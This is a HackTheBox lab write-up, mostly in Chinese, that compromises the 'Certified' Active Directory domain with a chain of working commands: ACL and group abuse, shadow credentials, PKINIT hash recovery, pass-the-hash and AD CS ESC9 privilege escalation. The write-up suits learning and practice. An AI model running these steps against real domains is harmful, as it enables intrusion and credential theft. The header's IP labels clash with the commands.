Certified on HackTheBox

Before all

Victim’s IP : 10.10.11.37
Victim’s Host : *.certified.htb
Attacker’s IP : 10.10.11.41

Initial Credential : judith.mader/judith09

RECON

port scan

Command

rustscan -a 10.10.11.41 --ulimit 5000 -- -sC -sV -Pn

Result

Open 10.10.11.41:53
Open 10.10.11.41:88
Open 10.10.11.41:135
Open 10.10.11.41:139
Open 10.10.11.41:389
Open 10.10.11.41:445
Open 10.10.11.41:464
Open 10.10.11.41:593
Open 10.10.11.41:636
Open 10.10.11.41:3268
Open 10.10.11.41:3269
Open 10.10.11.41:5985
Open 10.10.11.41:9389
Open 10.10.11.41:49673
Open 10.10.11.41:49668
Open 10.10.11.41:49666
Open 10.10.11.41:49674
Open 10.10.11.41:49683
Open 10.10.11.41:49716
Open 10.10.11.41:49740
Open 10.10.11.41:52832
.......

標準地 AD 靶機，開了ldap, smb, kerberos, winrpc

bloodhound

Command

bloodhound-python -c All -u 'judith.mader' -p 'judith09' -d certified.htb -ns 10.10.11.41 --zip

開neo4j後丟bloodhound，有一條赤裸裸的攻擊鍊就出來ㄌ

judith.mader -> (GenericWrite) -> Manager Group -> (GenericWrite) -> management_svc

Exploit

GenericWrite to Group

對 Group 的 Generic Write 攻擊思路是：
將自己寫為那個 Group 的 Owner -> 寫入 WriteMembers 權限給自己 -> 把自己加入那個 Group

impacket-owneredit -action write -new-owner 'judith.mader' -target 'Management' 'certified.htb'/'judith.mader':'judith09' -dc-ip 10.10.11.41
impacket-dacledit -action 'write' -rights 'WriteMembers' -principal 'judith.mader' -target 'Management' 'certified.htb'/'judith.mader':'judith09' -dc-ip 10.10.11.41 
net rpc group addmem "Management" "judith.mader" -U "certified.htb"/"judith.mader"%"judith09" -S "DC01.certified.htb"

最後確認一下自己已經在 Group 裡面

net rpc group members "Management"  -U "certified.htb"/"judith.mader"%"judith09" -S "DC01.certified.htb"

Result

CERTIFIED\management_svc

GenericWrite to User (Shadow Credential)

先用 pywhisker
Command

pywhisker -d "certified.htb" -u "judith.mader" -p "judith09" --target "management_svc" --action "add"

接著從前一台學到的，先用了targetedKerberoast.py，也確實可以拿到TGT，但爆破不了密碼…
一樣，如果遇到問題就同步時間

sudo su
timedatectl set-ntp off
rdate -n 10.10.11.41

改成使用 PKINITtools
利用前面建立的 pfx 檔案與 gettgtpkinit.py 從 TGT 獲取 AS-REP 的密鑰，最後再用 getnthash.py 結合 AS-REP key 撈 NT HASH

python3 gettgtpkinit.py certified.htb/management_svc -cert-pfx R2D0pSI0.pfx -pfx-pass 'u8Fz4h1NP1eVJw5SoDQo' management_svc.ccache
export KRB5CCNAME=management_svc.ccache
python3 getnthash.py certified.htb/management_svc -key 296cf9f3778e6dfe4824724ca105fcc7a81cf85dc1d0c3481aee00c2c092a5f9

Result

[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
a091c1832bcdd4677c28b5a6a1295584

Pass The Hash

Keberos 版本過舊，一般 user 也可以 NT hash 過驗證

evil-winrm -u 'management_svc' -H 'a091c1832bcdd4677c28b5a6a1295584' -i 10.10.11.41

Privilege Escalation

ca_operator

用 bloodhound 繼續追，首先可以發現 management_svc 對 ca_operator 有 GenericAll…

在 evil-winrm 的 shell 直接幫他換密碼XD

net user ca_operator Whale120

AD CS ESC9

先丟個坑要自己學：https://book.hacktricks.xyz/cn/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation

利用 certipy 進行針對 CS (憑證服務) 進行 RECON

certipy-ad find -u [email protected] -p judith09 -dc-ip 10.10.11.41

注意到 Enrollment Flag 有 NoSecurityExtension 的設定，適用於 ESC9 的攻擊方案

具體流程是透過 GenericWrite 寫入 ca_operator 的 upn，再透過申請憑證的方法獲得 Admin 的 NTLM HASH

Command

certipy-ad account update -username '[email protected]' -hashes 'a091c1832bcdd4677c28b5a6a1295584' -user ca_operator -upn 'Administrator'
certipy-ad req -username '[email protected]' -p 'Whale120' -ca certified-DC01-CA -template CertifiedAuthentication -debug
certipy-ad auth -pfx administrator.pfx -domain 'CERTIFIED.HTB'  -dc-ip 10.10.11.41 -username Administrator -debug

Result

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: [email protected]
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34

最後再針對 Administrator 進行一次 Pass The Hash 即可

evil-winrm -u 'Administrator' -H '0d5b49608bbce1751f708748f67e2d34' -i 10.10.11.41

PWNED!!